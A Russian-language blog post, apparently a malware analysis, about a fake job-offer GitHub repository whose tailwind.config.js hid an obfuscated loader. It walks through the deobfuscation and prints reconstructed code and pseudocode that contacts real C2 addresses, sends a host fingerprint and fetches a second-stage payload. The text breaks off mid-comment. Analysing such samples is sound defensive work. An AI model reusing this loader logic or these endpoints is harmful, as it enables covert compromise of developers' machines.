{"id":479201,"date":"2026-05-10T09:15:38","date_gmt":"2026-05-10T09:15:38","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=479201"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=479201","title":{"rendered":"\u0411\u044d\u043a\u0434\u043e\u0440 \u0432\u043c\u0435\u0441\u0442\u043e \u0442\u0435\u0441\u0442\u043e\u0432\u043e\u0433\u043e"},"content":{"rendered":"
\n

TL;DR:<\/h4>\n

\u0412 GitHub-\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u043e\u0432\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0431\u044b\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434, \u0441\u043f\u0440\u044f\u0442\u0430\u043d\u043d\u044b\u0439 \u0432 tailwind.config.js<\/code>. \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0444\u0430\u0439\u043b \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u044b\u0439 Tailwind-\u043a\u043e\u043d\u0444\u0438\u0433, \u043d\u043e \u0432 \u043a\u043e\u043d\u0446\u0435 \u0431\u044b\u043b\u0430 \u0434\u043b\u0438\u043d\u043d\u0430\u044f \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f JS-\u0441\u0442\u0440\u043e\u043a\u0430. \u041f\u0440\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0430 \u043a\u043e\u0434 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u043b fs<\/code>, os<\/code>, request<\/code>, path<\/code>, node:process<\/code> \u0438 child_process<\/code>, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u043b\u0441\u044f \u0441 C2 \u043d\u0430 78.142.218.26:1244 \u0438\u043b\u0438 66.235.168.17:1244, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0444\u0438\u043d\u0433\u0435\u0440\u043f\u0440\u0438\u043d\u0442 \u043c\u0430\u0448\u0438\u043d\u044b, \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b \u0432\u0442\u043e\u0440\u043e\u0439 payload \u0432 ~\/.vscode\/f.js<\/code>, \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u043b ~\/.vscode\/package.json<\/code>, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b npm install \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u043b payload \u0432 \u0444\u043e\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 node\/nohup. \u0418\u043d\u044b\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c\u0438, \u044d\u0442\u043e \u0431\u044b\u043b \u043d\u0435 \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442, \u0430 loader\/downloader, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u0434 frontend-\u0437\u0430\u0434\u0430\u043d\u0438\u0435.<\/p>\n

\u0421\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c<\/h2>\n

\u0412 LinkedIn \u043c\u043d\u0435 \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u043d\u0435\u043a\u0442\u043e, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0432\u0448\u0438\u0439\u0441\u044f \u043a\u0430\u043a Renz Andrey Barrion<\/strong><\/a>,<\/strong> \u0441 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0440\u0430\u0431\u043e\u0442\u044b. \u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0443\u0436\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0430. \u041d\u0435\u043c\u043d\u043e\u0433\u043e \u0441\u043c\u0443\u0442\u0438\u043b\u0430 \u043f\u043e\u0434\u043f\u0438\u0441\u044c: \u00abProject Manager at Bext360\u00bb (\u043d\u0435 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e, \u0447\u0442\u043e Bext360 \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u043d\u0430 \u043a \u043d\u0438\u0436\u0435\u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c\u0443). \u041f\u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u043c, \u0447\u0442\u043e \u043f\u0438\u0448\u0435\u0442 \u043f\u0440\u043e\u0434\u0436\u0435\u043a\u0442, \u0430 \u043d\u0435 HR. \u041d\u043e \u0434\u0430 \u043b\u0430\u0434\u043d\u043e, \u043c\u0430\u043b\u043e \u043b\u0438 \u043a\u0430\u043a\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b \u043d\u0430\u0439\u043c\u0430 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c.<\/p>\n

Renz \u0441\u043e\u043e\u0431\u0449\u0438\u043b, \u0447\u0442\u043e \u0432 \u0435\u0433\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f Senior Front End Developer \u043d\u0430 \u043d\u0435\u043f\u043b\u043e\u0445\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u042f \u0441\u043a\u0438\u043d\u0443\u043b \u0440\u0435\u0437\u044e\u043c\u0435, \u043e\u043d \u0440\u0430\u0441\u0441\u043f\u0440\u043e\u0441\u0438\u043b \u043e\u0431 \u043e\u043f\u044b\u0442\u0435, \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043b \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043d\u0430\u0439\u043c\u0430 \u0438 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0438\u043b \u043f\u0440\u043e\u0439\u0442\u0438 \u0442\u0435\u0441\u0442\u043e\u0432\u043e\u0435, \u0441 \u0447\u0435\u043c \u044f \u0441\u043e\u0433\u043b\u0430\u0441\u0438\u043b\u0441\u044f \u2013 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0440\u0435\u043d\u0435\u0441\u0441\u0430\u043d\u0441 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0445. \u0420\u0435\u043d\u0446 \u0441\u043a\u0438\u043d\u0443\u043b \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 https:\/\/github.com\/Stash-Home\/Home-assignment-u<\/a> (\u0442\u043e\u0436\u0435 \u0443\u0436\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0430).<\/p>\n

\u041f\u0440\u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0438 \u044f \u043e\u0431\u0440\u0430\u0442\u0438\u043b \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0440\u0430\u0437\u043c\u0435\u0440 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f \u2013 \u0431\u043e\u043b\u044c\u0448\u0435 5 \u043c\u0435\u0433\u0430\u0431\u0430\u0439\u0442, \u0447\u0442\u043e \u043a\u0430\u043a \u0431\u044b \u043e\u0447\u0435\u043d\u044c \u043c\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u0440\u0435\u043f\u044b \u0441 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c (\u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f, \u043d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e). \u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u0434\u0438\u0432\u0438\u043b\u043e \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0444\u043e\u0440\u043a\u043e\u0432: \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0444\u043e\u0440\u043a\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442\u0430\u043c\u0438. \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0444\u043e\u0440\u043a\u043e\u0432 \u043d\u0435\u0442\u0438\u043f\u0438\u0447\u043d\u043e \u0434\u043b\u044f \u0442\u0430\u043a\u0438\u0445 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432.<\/p>\n

\u041d\u0430\u0447\u0430\u043b \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c\u0441\u044f \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0432\u043e\u0442 \u0447\u0442\u043e.<\/p>\n

\u041d\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0440\u043e\u0447\u043a\u0435 tailwind.config.js<\/code> \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u043f\u0440\u043e\u0431\u0435\u043b\u043e\u0432 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430:<\/p>\n

const a0ag=a0a1,a0ah=a0a1,...<\/code>
<\/a><\/div><\/pre>\n
\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0442\u0430\u043a\u043e\u0435?<\/p>\n
\u041a\u0430\u043a \u0443\u0441\u0442\u0440\u043e\u0435\u043d\u0430 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f<\/h2>\n
\u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u0431\u044b\u043b \u043c\u0430\u0441\u0441\u0438\u0432 base64-\u0441\u0442\u0440\u043e\u043a:<\/p>\n
function a0a0() {  const bm = ['AM9PBG','ywnisNy','wgDkCKO', ...]  ...}<\/code>
<\/a><\/div><\/pre>\n
\u0414\u0430\u043b\u0435\u0435 \u043c\u0430\u0441\u0441\u0438\u0432 \u0446\u0438\u043a\u043b\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u0434\u0432\u0438\u0433\u0430\u043b\u0441\u044f \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0441 parseInt(...)<\/code> \u043d\u0435 \u0434\u0430\u0441\u0442 \u043d\u0443\u0436\u043d\u043e\u0435 \u0447\u0438\u0441\u043b\u043e:<\/p>\n
(function(a0,a1){  const a2 = a0();  while (!![]) {    try {      const a3 = ...;      if (a3 === a1) break;      else a2.push(a2.shift());    } catch {      a2.push(a2.shift());    }  }}(a0a0, 0x7e0c4));<\/code>
<\/a><\/div><\/pre>\n
\u0426\u0435\u043b\u044c \u044d\u0442\u043e\u0433\u043e \u2013 \u0437\u0430\u043f\u0443\u0442\u0430\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0435 \u0438\u043d\u0434\u0435\u043a\u0441\u043e\u0432 \u0438 \u0441\u0442\u0440\u043e\u043a.<\/p>\n
\u0417\u0430\u0442\u0435\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u044f a0a1(...) <\/code>\u0434\u043e\u0441\u0442\u0430\u0451\u0442 \u0441\u0442\u0440\u043e\u043a\u0443 \u0438\u0437 \u043c\u0430\u0441\u0441\u0438\u0432\u0430 \u0438 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0435\u0451, \u0447\u0442\u043e \u0443\u043f\u0440\u043e\u0449\u0451\u043d\u043d\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:<\/p>\n
function decodeFromStringTable(index) {  const shiftedIndex = index - 0x113;  const encoded = stringTable[shiftedIndex];    return base64DecodeURIComponent(encoded);}<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440:<\/p>\n
a0a1(0x137) => \"utf8\"a0a1(0x182) => \"base6\"a0a1(0x171) => \"from\"a0a1(0x125) => \"toStr\"a0a1(0x126) => \"ing\"<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u043f\u043e\u0442\u043e\u043c \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u044d\u0442\u043e:<\/p>\n
Buffer.from(..., 'base64').toString('utf8')<\/code>
<\/a><\/div><\/pre>\n
\u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u0434\u0435\u043a\u043e\u0434\u0435\u0440 \u043e\u0442\u0440\u0435\u0437\u0430\u0435\u0442 \u043f\u0435\u0440\u0432\u044b\u0439 \u043c\u0443\u0441\u043e\u0440\u043d\u044b\u0439 \u0441\u0438\u043c\u0432\u043e\u043b, \u0430 \u043e\u0441\u0442\u0430\u0442\u043e\u043a \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a base64:<\/p>\n
function n(value) {  const withoutFirstChar = value.slice(1);  return Buffer.from(withoutFirstChar, 'base64').toString('utf8');}<\/code>
<\/a><\/div><\/pre>\n
\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440:<\/p>\n
n('ab3M') => 'os'n('bZnM') => 'fs'n('DcmVxdWVzdA') => 'request'n('NcGF0aA') => 'path'n('Xbm9kZTpwc...') => 'node:process'n('4Y2hpbGRf') + n('acHJvY2Vzcw') => 'child_process'<\/code>
<\/a><\/div><\/pre>\n
\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0441\u043f\u0440\u044f\u0442\u0430\u043d\u044b \u043a\u0430\u043a \u043c\u0430\u0441\u0441\u0438\u0432\u044b \u0447\u0438\u0441\u0435\u043b \u0438 \u043a \u043d\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f XOR \u0441 \u043a\u043b\u044e\u0447\u043e\u043c:<\/p>\n
const S = [0x70, 0xa0, 0x89, 0x48];function U(arr) {  let result = '';  for (let i = 0; i < arr.length; i++) {    result += String.fromCharCode((arr[i] ^ S[i & 3]) & 0xff);  }  return result;}<\/code>
<\/a><\/div><\/pre>\n
\u0447\u0442\u043e \u0434\u0430\u0451\u0442 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438:<\/p>\n
U([0x5e,0xd6,0xfa,0x2b,0x1f,0xc4,0xec]) => \".vscode\"U([0x16,0x8e,0xe3,0x3b])                 => \"f.js\"U([0x0,0xc1,0xea,0x23,0x11,0xc7,0xec,0x66,0x1a,0xd3,0xe6,0x26])  => \"package.json\"U([0x5f,0xc6,0xa6]) => \"\/f\/\"U([0x5f,0xd0])      => \"\/p\"U([0x13,0xc4]) => \"cd\"U([0x56,0x86,0xa9,0x26,0x0,0xcd,0xa9,0x21,0x50,0x8d,0xa4,0x3b,0x19,0xcc,0xec,0x26,0x4])  => \"&& npm i --silent\"U([0x1e,0xd0,0xe4,0x68,0x5d,0x8d,0xf9,0x3a,0x15,0xc6,0xe0,0x30])  => \"npm --prefix\"U([0x1e,0xcf,0xed,0x2d,0x2f,0xcd,0xe6,0x2c,0x5,0xcc,0xec,0x3b])  => \"node_modules\"U([0x1e,0xcf,0xe1,0x3d,0x0]) => \"nohup\"<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u043a\u043b\u044e\u0447\u0435\u0432\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a:<\/p>\n
const os = require('os');const fs = require('fs');const request = require('request');const path = require('path');const process = require('node:process');const child_process = require('child_process');const homeDir = os.homedir();const hostname = os.hostname();const platform = os.platform();const userInfo = os.userInfo();const primaryC2 = 'http:\/\/78.142.218.26:1244';const fallbackC2 = 'http:\/\/66.235.168.17:1244';const campaignId = '90284f6b7643';<\/code>
<\/a><\/div><\/pre>\n
\u0423\u043f\u0440\u043e\u0449\u0451\u043d\u043d\u044b\u0439 \u043f\u0441\u0435\u0432\u0434\u043e\u043a\u043e\u0434 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430<\/h2>\n
\u042d\u0442\u043e \u0443\u043f\u0440\u043e\u0449\u0451\u043d\u043d\u0430\u044f \u0440\u0435\u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043b\u043e\u0433\u0438\u043a\u0438 (C2 \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u044d\u0442\u043e «C<\/strong>ommand and C<\/strong>ontrol», \u0442\u043e \u0435\u0441\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f):<\/p>\n
\/** * Entry point \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430. * * \u0418\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 timestamp \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u043f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f \u0441\u0432\u044f\u0437\u0438 * \u0441 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c. * * \u0412 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u043c \u043a\u043e\u0434\u0435 \u044d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0441\u0440\u0430\u0437\u0443 \u043f\u0440\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 * `tailwind.config.js`, \u0442\u043e \u0435\u0441\u0442\u044c \u0432\u043e \u0432\u0440\u0435\u043c\u044f dev\/build \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430. * * \u041f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435: * 1. \u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0432\u0440\u0435\u043c\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430. * 2. \u041f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0441 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c. * 3. \u041f\u0440\u0438 \u043e\u0448\u0438\u0431\u043a\u0435 \u0434\u0430\u043b\u044c\u0448\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 fallback-\u043b\u043e\u0433\u0438\u043a\u0430. * * @returns {void} *\/function main() {  timestamp = Date.now().toString();  tryHandshake(0);}\/** * \u041f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0439 handshake \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c. * * \u0424\u0443\u043d\u043a\u0446\u0438\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 GET-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 `\/s\/<campaignId>`. * \u041f\u0435\u0440\u0432\u044b\u0439 \u0432\u044b\u0437\u043e\u0432 \u0438\u0434\u0451\u0442 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0435\u0440\u0432\u0435\u0440. \u0415\u0441\u043b\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, * \u043a\u043e\u0434 \u043f\u0440\u043e\u0431\u0443\u0435\u0442 fallback. * * \u042d\u0442\u043e\u0442 \u044d\u0442\u0430\u043f \u043d\u0443\u0436\u0435\u043d \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0443, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 * \u0438 \u0442\u0438\u043f payload, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0443\u0436\u043d\u043e \u0441\u043a\u0430\u0447\u0430\u0442\u044c. * * @param {number} index * \u0418\u043d\u0434\u0435\u043a\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0432 \u0441\u043f\u0438\u0441\u043a\u0435. * `0` \u2014 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0435\u0440\u0432\u0435\u0440. * `1` \u2014 fallback-\u0441\u0435\u0440\u0432\u0435\u0440. * * @returns {void} *\/function tryHandshake(index) {  const url = `${C2[index]}\/s\/${campaignId}`;  request.get(url, (error, response, body) => {    if (error) {      if (index < 1) {        tryHandshake(1);      }      return;    }    if (!parseServerResponse(body)) {      return;    }    reportHost();    downloadAndRunPayload();  });}\/** * \u0420\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0442\u0432\u0435\u0442 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u0441\u043b\u0435 handshake-\u0437\u0430\u043f\u0440\u043e\u0441\u0430. * * \u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0436\u0438\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u043e\u0442\u0432\u0435\u0442 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441 \u043c\u0430\u0440\u043a\u0435\u0440\u0430 `ZT3`. * \u0412\u0441\u0451, \u0447\u0442\u043e \u0438\u0434\u0451\u0442 \u043f\u043e\u0441\u043b\u0435 `ZT3`, \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438\u0437 base64. * * \u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u043e\u0436\u0438\u0434\u0430\u0435\u0442 \u0441\u0442\u0440\u043e\u043a\u0443 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0433\u043e \u0444\u043e\u0440\u043c\u0430\u0442\u0430: * * `<host>,<type>` * * \u0413\u0434\u0435: * - `host` \u2014 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 C2-host, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0434\u0430\u043b\u044c\u0448\u0435 \u0431\u0443\u0434\u0443\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0442\u044c\u0441\u044f payload \u0438 package.json. * - `type` \u2014 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0438\u043b\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 payload. * * \u0415\u0441\u043b\u0438 \u0444\u043e\u0440\u043c\u0430\u0442 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442, \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 `false`, * \u0438 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u0435\u043a\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f. * * @param {string} body * \u0422\u0435\u043b\u043e HTTP-\u043e\u0442\u0432\u0435\u0442\u0430. * * @returns {boolean} * `true`, \u0435\u0441\u043b\u0438 \u043e\u0442\u0432\u0435\u0442 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d \u0438 \u0433\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u044b\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f `baseUrl` \u0438 `type` \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u044b. * `false`, \u0435\u0441\u043b\u0438 \u043e\u0442\u0432\u0435\u0442 \u043d\u0435 \u043f\u043e\u0445\u043e\u0436 \u043d\u0430 \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u044b\u0439 C2-\u043e\u0442\u0432\u0435\u0442. *\/function parseServerResponse(body) {  if (!body.startsWith('ZT3')) {    return false;  }  const encoded = body.slice(3);  const decoded = Buffer.from(encoded, 'base64').toString('utf8');  const parts = decoded.split(',');  baseUrl = `http:\/\/${parts[0]}:1244`;  type = parts[1];  return true;}\/** * \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432. * * \u0424\u0443\u043d\u043a\u0446\u0438\u044f \u0434\u0435\u043b\u0430\u0435\u0442 POST-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 `\/keys` \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u043d\u0430\u0431\u043e\u0440 \u0434\u0430\u043d\u043d\u044b\u0445, * \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043c\u043e\u0436\u0435\u0442 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043c\u0430\u0448\u0438\u043d\u0443 \u0438 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430. * * \u0412 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u0445\u043e\u0434\u044f\u0442: * - timestamp \u0437\u0430\u043f\u0443\u0441\u043a\u0430; * - \u0442\u0438\u043f payload, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043e\u0442 C2; * - hostname; * - username \u043d\u0430 macOS; * - \u043f\u0443\u0442\u044c \u0438\u043b\u0438 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0431\u044b\u043b 